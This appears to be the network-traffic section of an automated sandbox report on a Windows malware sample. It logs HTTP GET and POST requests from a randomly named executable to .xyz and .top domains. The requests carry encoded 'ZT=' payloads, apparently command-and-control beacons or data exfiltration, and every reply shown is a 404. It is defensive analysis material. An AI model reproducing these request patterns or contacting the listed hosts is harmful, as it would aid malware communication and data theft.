                                                                                                                                                                              Data Raw: 5a 54 3d 4d 4e 57 78 6b 48 2f 76 74 6a 7a 62 61 4c 43 78 32 58 78 6a 6a 2b 71 4f 63 70 30 41 37 2b 65 2b 39 56 39 2f 48 37 6b 53 79 56 6b 49 31 63 68 4c 38 5a 4b 65 6b 46 46 53 42 6c 55 55 70 46 4e 63 6f 52 4c 59 57 2b 61 5a 73 70 4e 44 2b 78 52 67 63 65 58 65 59 4c 2f 71 39 4e 6c 59 41 51 76 2b 44 52 57 44 63 43 54 56 67 64 49 66 75 4b 63 66 6b 6a 74 65 58 55 4f 47 6e 48 49 6c 75 76 70 66 33 4f 33 57 63 44 50 58 32 4f 71 57 50 62 38 69 61 2f 76 52 4f 34 42 62 6c 57 67 45 4e 33 4d 56 6c 4f 59 52 4f 56 75 4d 4e 75 65 39 66 78 65 45 59 35 36 6d 75 7a 6b 66 49 30 65 49 31 37 6d 42 52 6c 67 31 47 4f 71 63 61 6c 44 4c 61 68 2b 37 38 61 38 6e 46 6e 65 75 6e 78 65 77 57 78 70 62 42 79 52 70 31 55 6e 57 57 79 4c 57 42 66 6a 36 64 75 48 4e 54 4c 4a 56 6b 65 67 4a 2f 32 74 52 76 57 6d 34 65 47 52 50 4d 39 4e 47 4f 4f 54 6c 41 4d 70 72 65 68 34 51 32 4c 4e 58 53 56 6d 32 62 59 6e 61 4c 49 4b 50 35 6e 32 41 2f 41 35 49 4b 65 5a 52 61 65 67 4a 5a 32 6f 77 51 7a 5a 5a 46 2f 73 42 72 45 30 73 55 6e 30 4d 6b 68 6e [TRUNCATED]
                                                                                                                                                                              Data Ascii: ZT=MNWxkH/vtjzbaLCx2Xxjj+qOcp0A7+e+9V9/H7kSyVkI1chL8ZKekFFSBlUUpFNcoRLYW+aZspND+xRgceXeYL/q9NlYAQv+DRWDcCTVgdIfuKcfkjteXUOGnHIluvpf3O3WcDPX2OqWPb8ia/vRO4BblWgEN3MVlOYROVuMNue9fxeEY56muzkfI0eI17mBRlg1GOqcalDLah+78a8nFneunxewWxpbByRp1UnWWyLWBfj6duHNTLJVkegJ/2tRvWm4eGRPM9NGOOTlAMpreh4Q2LNXSVm2bYnaLIKP5n2A/A5IKeZRaegJZ2owQzZZF/sBrE0sUn0MkhnzriC29WD/MHi+2H1K5HqzOt3k61Fv4AxbcW1Mf+5fGAhsziCw4ayd2amuzWCNXfFUHqlgc25yDUzwT4gaMVMf05lNhsZOyO14ToGIIUnRAcZX+hMJnYhOoqzbzrTsPzk5L2PqLkdDLDd0QGbil5e+edMWEtmmWL1VsaUy49B94ihOV2vX2X87Eqp7488HSIq7vO1kCGT5ec5Qqu1IzINIiplLbQyEYEtKtY4O2Lg2TviMXa/3hmj3hkF3Cc3nIElblb+XFzN8oej8clt+9EJbJDaS9ym+0P324ud+FPbpQ7tsyVgVFQjr9d3vIF2zIdQUdEE56dG5WSRbbBLtYLmMOj1m9f5pljsLWm8Dc1JtrJTBLsOW/rubfhzzT0F4fmmY4cCmp9l1gR21tAn/UQMlQwUNi/CRHmiRmiewT3vfprj2xQ/tqOdkE6XksSahXnBJ7jJ2hXgloJiYfG775PxffYaYaFwoz1KaWe8Xog2czwxaqPERp43AX3WUBlIVNbSdY8f4CgTThnv2IRFwDfWWXk0jpXAWvEuNPm2wRwFve1xcI2Tvkrt7sdE62xekAZUOUctzGIfHlhy+ikpaA+c5e7k1QRY40XtOo9w52mTDPVBzHE3ucIoY91EXHpKmM6o9L8Y5ryrauTvmxM57/QsnzZtZ/ADtTYdd8 [TRUNCATED]
                                                                                                                                                                              Oct 30, 2024 08:12:03.452763081 CET1033INHTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Wed, 30 Oct 2024 07:12:03 GMT
                                                                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BIep7RoKluhaXx9zrtMoL1J8SZJi0wHdCaYMe2LCN5%2FfySoQnREHGHdGqG9AZMv9Z2IBmhm3zDIRqIVeAVIF6%2Fqh3pzvb8WX4viL6YIO0acjihyFtOdJ08Iyr8elpocQdQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8da9984479884784-DFW
                                                                                                                                                                              Content-Encoding: gzip
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1932&sent=4&recv=10&lost=0&retrans=0&sent_bytes=0&recv_bytes=10806&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                              Data Raw: 64 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 77 b2 4e d5 03 48 ab 95 a0 49 45 a5 50 22 70 0f 3d 1a bc 95 2b b5 71 b0 5d 42 f9 7a 94 54 48 5c 67 de 8c 66 e8 a6 7a 59 9a 5d 5b c3 93 79 6e a0 dd 3e 36 eb 25 cc 6e 11 d7 b5 59 21 56 a6 ba 3a f3 42 23 d6 9b 19 2b f2 f9 74 64 f2 62 1d 2b ca 87 7c 14 5e e8 05 6c 42 86 55 38 77 8e f0 2a 2a c2 09 a2 f7 e0 2e 63 ae e4 7f 8c 2f 59 51 cf c6 0b 44 f9 3c 4b ca e2 60 fb da c0 60 13 74 21 c3 7e e4 20 74 90 fd 21 41 92 f8 25 b1 20 ec c7 a6 c8 8a ac 73 51 52 e2 87 de 7e 78 81 b7 09 00 9b 61 18 86 42 df 97 f3 52 17 df 97 1f 68 43 cc 70 a7 09 ff 02 8a 70 5a 44 38 3d f9 05 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 04 f8 69 a3 04 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: d6LN0DwNHIEP"p=+q]BzTH\gfzY][yn>6%nY!V:B#+tdb+|^lBU8w**.c/YQD<K``t!~ t!A% sQR~xaBRhCppZD8=bi0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              24192.168.2.450031172.67.154.67803804C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 30, 2024 08:12:05.394185066 CET443OUTGET /jwed/?ZT=BP+RnxL4kRmCbJis2H94uci3abF0xOX/uWRdW7IS0nQn3eBqrLGhokpRAgB0njlljCrnZN3jlOJi4UAaeIXlep/T+OgRPR3ifAipJWCHkORcjZ0KtUFfU2c=&mTkD=Gj2Ti2T0g4 HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.091210.xyz
                                                                                                                                                                              Connection: close
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Oct 30, 2024 08:12:06.046822071 CET1029INHTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Wed, 30 Oct 2024 07:12:05 GMT
                                                                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xinIiWNRIcHwM5X8ZP5mjpq%2BfM1UOr8lkUaDr6egOXumJ72RaajFtJcZbT5MNV7e7IpoWi1SixLr9K5fdes9AIZucXajbfrI1Cg%2B5kmWwfisbIVDwpxydofQgskZL9XrYg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8da99854ddcd3ab5-DFW
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1112&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=443&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                              Data Raw: 31 30 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 30 39 31 32 31 30 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                                                              Data Ascii: 104<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.091210.xyz Port 80</address></body></html>
                                                                                                                                                                              Oct 30, 2024 08:12:06.046880960 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              25192.168.2.45003220.2.249.7803804C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 30, 2024 08:12:14.255358934 CET704OUTPOST /wr26/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.adsa6c.top
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 199
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.adsa6c.top
                                                                                                                                                                              Referer: http://www.adsa6c.top/wr26/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Raw: 5a 54 3d 78 57 50 67 51 58 50 72 64 6f 52 32 2f 6a 48 41 2f 47 47 48 52 45 30 33 34 53 4e 47 67 30 4e 46 39 69 41 73 44 77 6c 34 74 45 6f 78 46 67 6f 34 31 46 33 56 73 55 42 43 6c 4e 7a 68 4f 43 77 4f 68 34 4f 73 50 64 39 2b 64 77 51 44 41 63 69 6d 41 77 4a 49 2f 38 36 57 52 57 41 38 41 52 36 45 45 42 53 4d 44 4e 4a 2f 55 46 53 49 6d 5a 59 5a 62 71 61 34 7a 6c 68 74 44 30 42 2b 69 62 63 4b 39 70 6a 46 41 78 63 58 6d 71 38 58 55 77 31 77 33 46 36 51 4f 45 69 6f 33 74 4b 47 36 6a 67 36 6f 5a 31 43 4d 41 67 71 39 72 59 69 77 47 52 35 78 5a 53 57 2b 57 53 50 4f 41 38 4f 79 31 46 4e 36 67 3d 3d
                                                                                                                                                                              Data Ascii: ZT=xWPgQXPrdoR2/jHA/GGHRE034SNGg0NF9iAsDwl4tEoxFgo41F3VsUBClNzhOCwOh4OsPd9+dwQDAcimAwJI/86WRWA8AR6EEBSMDNJ/UFSImZYZbqa4zlhtD0B+ibcK9pjFAxcXmq8XUw1w3F6QOEio3tKG6jg6oZ1CMAgq9rYiwGR5xZSW+WSPOA8Oy1FN6g==
                                                                                                                                                                              Oct 30, 2024 08:12:15.186750889 CET289INHTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Wed, 30 Oct 2024 07:12:15 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 146
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              26192.168.2.45003320.2.249.7803804C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 30, 2024 08:12:16.808760881 CET724OUTPOST /wr26/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.adsa6c.top
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 219
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.adsa6c.top
                                                                                                                                                                              Referer: http://www.adsa6c.top/wr26/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Raw: 5a 54 3d 78 57 50 67 51 58 50 72 64 6f 52 32 2b 44 33 41 7a 48 47 48 47 55 30 34 33 79 4e 47 70 55 4e 5a 39 69 4d 73 44 31 63 6c 73 33 41 78 46 42 59 34 6e 51 44 56 35 55 42 43 39 39 7a 67 41 69 77 52 68 34 44 54 50 59 64 2b 64 77 45 44 41 64 53 6d 41 48 31 4c 77 4d 36 55 5a 32 41 36 45 52 36 45 45 42 53 4d 44 4e 4e 52 55 46 4b 49 36 36 51 5a 62 4c 61 2f 74 56 68 75 54 45 42 2b 31 4c 63 4f 39 70 6a 64 41 77 41 39 6d 76 34 58 55 77 6c 77 33 55 36 66 58 30 69 75 39 4e 4c 78 2b 79 38 30 6d 72 4d 71 48 52 63 2f 6a 35 42 43 31 41 63 6a 67 6f 7a 42 73 57 32 38 54 48 31 36 2f 32 34 45 68 69 4f 48 2f 4d 66 37 4c 78 6f 31 55 4f 4b 70 33 64 6b 2b 39 77 34 3d
                                                                                                                                                                              Data Ascii: ZT=xWPgQXPrdoR2+D3AzHGHGU043yNGpUNZ9iMsD1cls3AxFBY4nQDV5UBC99zgAiwRh4DTPYd+dwEDAdSmAH1LwM6UZ2A6ER6EEBSMDNNRUFKI66QZbLa/tVhuTEB+1LcO9pjdAwA9mv4XUwlw3U6fX0iu9NLx+y80mrMqHRc/j5BC1AcjgozBsW28TH16/24EhiOH/Mf7Lxo1UOKp3dk+9w4=
                                                                                                                                                                              Oct 30, 2024 08:12:17.752625942 CET289INHTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Wed, 30 Oct 2024 07:12:17 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 146
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              27192.168.2.45003420.2.249.7803804C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 30, 2024 08:12:19.359023094 CET10806OUTPOST /wr26/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.adsa6c.top
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 10299
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.adsa6c.top
                                                                                                                                                                              Referer: http://www.adsa6c.top/wr26/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Raw: 5a 54 3d 78 57 50 67 51 58 50 72 64 6f 52 32 2b 44 33 41 7a 48 47 48 47 55 30 34 33 79 4e 47 70 55 4e 5a 39 69 4d 73 44 31 63 6c 73 78 59 78 47 33 73 34 31 6a 62 56 72 6b 42 43 6a 4e 7a 39 41 69 78 4e 68 38 6e 66 50 59 5a 45 64 7a 38 44 43 37 75 6d 43 32 31 4c 6e 38 36 55 56 57 41 2f 41 52 36 4e 45 42 69 41 44 4e 64 52 55 46 4b 49 36 36 38 5a 53 36 61 2f 76 56 68 74 44 30 42 49 69 62 63 32 39 74 50 4e 41 77 45 48 6d 37 4d 58 55 52 56 77 36 47 53 66 49 45 69 73 2b 4e 4c 70 2b 79 78 32 6d 72 51 49 48 52 34 56 6a 37 64 43 34 55 45 36 31 4c 62 73 77 32 54 6c 51 42 39 47 6b 56 63 48 6d 79 4f 6d 7a 39 44 43 64 41 67 4e 57 63 33 78 6c 5a 59 66 6b 46 6c 6e 66 30 69 4b 6c 4b 42 75 39 32 6a 46 31 58 38 5a 4d 39 48 67 55 4d 6c 56 58 32 6d 67 63 4e 32 7a 4a 44 32 39 42 41 2b 7a 75 71 78 2b 48 39 44 73 50 38 4a 54 38 35 35 37 6f 73 42 65 4f 39 51 31 31 45 55 2f 6e 41 7a 79 50 64 41 74 63 71 6f 63 49 32 4b 34 6f 76 41 7a 39 43 6b 6c 6c 41 59 6f 37 64 62 47 51 47 4a 2f 32 50 6f 67 43 4c 70 64 4a 51 42 74 44 34 6b [TRUNCATED]
                                                                                                                                                                              Data Ascii: ZT=xWPgQXPrdoR2+D3AzHGHGU043yNGpUNZ9iMsD1clsxYxG3s41jbVrkBCjNz9AixNh8nfPYZEdz8DC7umC21Ln86UVWA/AR6NEBiADNdRUFKI668ZS6a/vVhtD0BIibc29tPNAwEHm7MXURVw6GSfIEis+NLp+yx2mrQIHR4Vj7dC4UE61Lbsw2TlQB9GkVcHmyOmz9DCdAgNWc3xlZYfkFlnf0iKlKBu92jF1X8ZM9HgUMlVX2mgcN2zJD29BA+zuqx+H9DsP8JT8557osBeO9Q11EU/nAzyPdAtcqocI2K4ovAz9CkllAYo7dbGQGJ/2PogCLpdJQBtD4kduCesBStB/qVtBnMn/Pa/Jko/6DroB0k8BnMDgs2w5vMX43Cd65qnrstxnrZ3cv/CjAtkgNQPUzmoujYFulG7H6IrNGwZOFAJbxDkFH5/VtnzRsNiUdLVYUgAiBK5faqFksIabcgw4GisRpG1FarUufc/ZHVtdlKIxyZ1OGLmi2GExXoOjMBoucnc8az71MAdBOWB3JEePYB96LFEzvALYRLsf67IJOOL3en+tpZqb056S1TTAAB9NaumM0gQMC32qnN5an97UTNKNHwiwU2EMfoElMb9h/Be1ViGIzIQr3L8Z2dAtYRiGHVpHHscXDqh2PfOYwNdfJbph8HjOhaMwyNC/8KAUXU0Qm+1+imFIHlGj/o3yYli46T8GPlW5eF3pLy7wCJPQTVbGhdBI9CElAac5W90z8766cVEJ7xBZKacdH4Nkz/Yc4iknNlcn3sZoxUSR1TgrkN5YwTm9lyQ8LUgK6KgZOmHHB0yVKxTaJtKgb0+xL4QcMrPtqtikeeBsjMew+Di/bT9V5HJx31zMXJUbOZx39tc7dsqKifUA8pcrzjZtLlQkgMKu1tqTHCrbpfd+t2EOlSDvViy2UQk6F0pAfTYWBE8/loBuklHmOZmwYdQ5C4jznCS8soWZc5+FebP1q+4lVB5HSBxSp4boX42EUbYPmGDm [TRUNCATED]
                                                                                                                                                                              Oct 30, 2024 08:12:20.298212051 CET289INHTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Wed, 30 Oct 2024 07:12:20 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 146
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              28192.168.2.45003520.2.249.7803804C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 30, 2024 08:12:21.897102118 CET443OUTGET /wr26/?ZT=8UnATjvfTpQ77jvixFCgWVUX2yh4jGZbjC17bXoElnpRCxInjgnE/2IqsqXHODoNl6OiDfBQBXM7D7XvNANc8/XGVjRwEyGKTULZaqlRQkXooaUfX5GSz0A=&mTkD=Gj2Ti2T0g4 HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.adsa6c.top
                                                                                                                                                                              Connection: close
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Oct 30, 2024 08:12:22.831274033 CET289INHTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Wed, 30 Oct 2024 07:12:22 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 146
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              29192.168.2.450036203.161.49.193803804C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 30, 2024 08:12:29.604518890 CET707OUTPOST /ep69/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.simplek.top
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 199
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.simplek.top
                                                                                                                                                                              Referer: http://www.simplek.top/ep69/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Raw: 5a 54 3d 34 48 67 73 69 6e 46 47 54 4f 6e 36 65 44 49 67 6b 44 65 57 32 56 67 75 64 54 37 50 66 6f 75 6d 59 31 59 52 64 71 74 73 6e 41 2f 43 2f 71 4b 2f 63 46 56 35 4f 55 71 68 32 50 76 74 5a 72 33 67 6e 2f 39 4c 4e 64 2f 4c 51 55 59 46 35 48 54 63 59 45 4b 4d 48 59 70 57 44 39 59 37 72 35 57 7a 49 73 67 56 36 61 77 71 45 57 38 79 4f 57 74 73 59 46 76 4e 7a 65 42 6a 42 79 7a 67 41 6f 34 71 6a 52 47 6e 31 51 70 2b 50 31 6d 49 79 2b 43 70 73 66 36 4e 4f 70 6f 34 66 41 6b 57 72 46 53 66 70 74 43 70 2b 2f 47 49 44 6d 58 78 61 35 71 38 45 2f 67 32 43 52 38 44 39 2b 44 37 62 48 6d 4a 76 77 3d 3d
                                                                                                                                                                              Data Ascii: ZT=4HgsinFGTOn6eDIgkDeW2VgudT7PfoumY1YRdqtsnA/C/qK/cFV5OUqh2PvtZr3gn/9LNd/LQUYF5HTcYEKMHYpWD9Y7r5WzIsgV6awqEW8yOWtsYFvNzeBjByzgAo4qjRGn1Qp+P1mIy+Cpsf6NOpo4fAkWrFSfptCp+/GIDmXxa5q8E/g2CR8D9+D7bHmJvw==
                                                                                                                                                                              Oct 30, 2024 08:12:30.271007061 CET533INHTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Wed, 30 Oct 2024 07:12:30 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Content-Length: 389
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Content-Type: text/html
